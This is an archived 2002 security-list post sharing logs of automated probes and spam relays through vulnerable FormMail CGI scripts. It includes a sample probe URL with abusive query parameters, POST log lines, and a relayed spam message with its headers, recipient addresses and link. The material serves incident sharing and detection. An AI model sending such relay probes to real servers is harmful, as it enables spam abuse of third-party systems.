Security Incidents mailing list archives
Re: Matt Wright FormMail Attacks
From: "Mike Lewinski" <mike () rockynet com>
Date: Mon, 14 Jan 2002 10:30:32 -0700
Looks like people are not serious about this probe. Is anybody know why number of formmail.pl attacks is growing? May be it is a part of SPAM toolkit or some very popular tool?
Yes, I've seen (and reported) what appear to be automated probes for
vulnerable installations. We had a client install that script on one of our
servers and I was fortunate to notice the bounces coming back to us very
quickly.
I am including two reports I filed, in case the log patterns are of use to
anyone. Note that in the first probe below, the attacker's subject line
identifies the server that was attempted.
Mike
----------------------------------------------------------------------------
----------------------
1) Failed probe:
GMT offset is -0700. This is a probe for a formmail.pl cgi script that can
be used to relay spam. It generated a 404 here.
Session Details
IP Address 65.34.109.21
Reverse DNS 6534109hfc21.tampabay.rr.com
Time Spent 0 min
Hits / Kilobytes 1 / 0.61Kb
Browser Tag Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)
Referring URL
Date and Time URL
2002-01-07 19:20:24
/cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=www%2ecoloradowild%2eorg%2
fcgi%2dbin%2fformmail%2epl&recipient=bxw%40aol%2ecom&msg=w00t
----------------------------------------------------------------------------
----------------------
2) Successful relays:
The log times below are set to UTC, and were recorded on Jan 01, 2001. Also
attached is a sample of the bounced spam that was relayed through this
client's script (now disabled).
00:52:59 63.199.200.93 POST /cgi-bin/formmail.pl - 502 564 343 80
Microsoft+URL+Control+-+6.00.8862 -
00:52:59 63.199.200.93 POST /cgi-bin/formmail.cgi - 200 10590 345 80
Microsoft+URL+Control+-+6.00.8862 -
13:17:51 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1737 80
Microsoft+URL+Control+-+6.00.8862 -
21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80
Microsoft+URL+Control+-+6.00.8862 -
21:15:23 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11562 1495 80
Microsoft+URL+Control+-+6.00.8862 -
21:16:27 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1329 80
Microsoft+URL+Control+-+6.00.8862 -
21:26:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11780 1554 80
Microsoft+URL+Control+-+6.00.8862 -
21:28:54 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11462 1241 80
Microsoft+URL+Control+-+6.00.8862 -
21:35:09 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11615 1391 80
Microsoft+URL+Control+-+6.00.8862 -
21:40:39 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11323 1108 80
Microsoft+URL+Control+-+6.00.8862 -
21:42:33 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11549 1331 80
Microsoft+URL+Control+-+6.00.8862 -
21:42:58 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11535 1316 80
Microsoft+URL+Control+-+6.00.8862 -
21:43:26 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11674 1459 80
Microsoft+URL+Control+-+6.00.8862 -
21:43:56 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11930 1705 80
Microsoft+URL+Control+-+6.00.8862 -
21:44:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11344 1121 80
Microsoft+URL+Control+-+6.00.8862 -
21:45:14 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11817 1589 80
Microsoft+URL+Control+-+6.00.8862 -
21:49:47 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 8597 1477 80
Microsoft+URL+Control+-+6.00.8862 -
21:55:43 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11695 1250 80
Microsoft+URL+Control+-+6.00.8862 -
22:06:03 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1364 80
Microsoft+URL+Control+-+6.00.8862 -
22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1601 80
Microsoft+URL+Control+-+6.00.8862 -
22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1336 80
Microsoft+URL+Control+-+6.00.8862 -
22:09:38 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1308 80
Microsoft+URL+Control+-+6.00.8862 -
22:11:06 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1533 80
Microsoft+URL+Control+-+6.00.8862 -
22:18:28 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1580 80
Microsoft+URL+Control+-+6.00.8862 -
22:18:34 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1236 80
Microsoft+URL+Control+-+6.00.8862 -
Note that this spam sample matches from the line above by timestamp. It does
not otherwise show the originating IP in the headers (a flaw in Blat IMHO):
21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80
Microsoft+URL+Control+-+6.00.8862 -
Received: from rockynet.com (smtp.rockynet.com [206.168.216.11]) by
rly-xc01.mx.aol.com (v83.18) with ESMTP id MAILRELAYINXC17-0101160728; Tue,
01 Jan 2002 16:07:28 -0500
Received: from web3 [206.168.216.8] by rockynet.com
(SMTPD32-7.04) id A5112EDA00F2; Tue, 01 Jan 2002 14:07:29 -0700
Date: Tue, 01 Jan 2002 14:07:29 -0700
From: arkansas () candycanelane com
Sender: webmaster () rockynet com
Reply-to: webmaster () rockynet com
Subject: Need Extra Money? O794A2kx7cob4zQ
To: diana63814 () aol com, laver76 () aol com, pologuy21 () aol com,
diana63828 () aol com,
shanlynn () aol com, diana639 () aol com, laver7 () aol com, budmld () aol com,
shanlynne () aol com, budmlh58 () aol com, alisha4972 () aol com,
geoander () aol com, budmmann2 () aol com, shanlynng () aol com,
tomdawgo7 () aol com, mlewis9106 () aol com, jens235 () aol com,
jens239 () aol com, budmn151 () aol com
X-Mailer: WinNT's Blat ver 1.8.2b http://www.interlog.com/~tcharron
Message-Id: <200201011407277.SM00203@web3>
This is an online application from
(arkansas () candycanelane com) on Tuesday, January 1, 2002 at 14:07:29
-------------------------------------------------------
: <br><HTML><FONT BACK="#ffffff"
style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10><BR><BR>EARN MONEY
WORKING AT HOME<BR>WORK THE HOURS YOU WANT<BR><A
HREF="aol:/2000:http://www.ckoejzldwoji.com () tiffany6811 tripod com/#jcispqeq
vxunb">CLICK HERE</A> FOR
DETAILS<BR><BR></FONT></HTML><br><p><br><p><br><p><br><p><br><p><br><p>28D0c
k0SFAK7tb6jNInX7sPazoxX30PrqyoY06k9hp8dSUb5954vAVs95214lW6L28D0ck0SFAK7tb6jN
InX7sPazoxX30PrqyoY06k9hp8ddx7mJEj2544dJLaA21M1tM3B8QT7ls9CVQUFcjYrWYoG43YiE
wfO09
-------------------------------------------------------
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Matt Wright FormMail Attacks Pence, Derek A. (Jan 14)
- Re: Matt Wright FormMail Attacks Brannon (Jan 14)
- Re: Matt Wright FormMail Attacks Markus Stumpf (Jan 15)
- <Possible follow-ups>
- RE: Matt Wright FormMail Attacks Turner, Keith (Jan 14)
- RE: Matt Wright FormMail Attacks Christopher X. Candreva (Jan 14)
- RE: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Matt Wright FormMail Attacks Dmitri Smirnov (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Re: Matt Wright FormMail Attacks jlewis (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Michael Hottinger (Jan 15)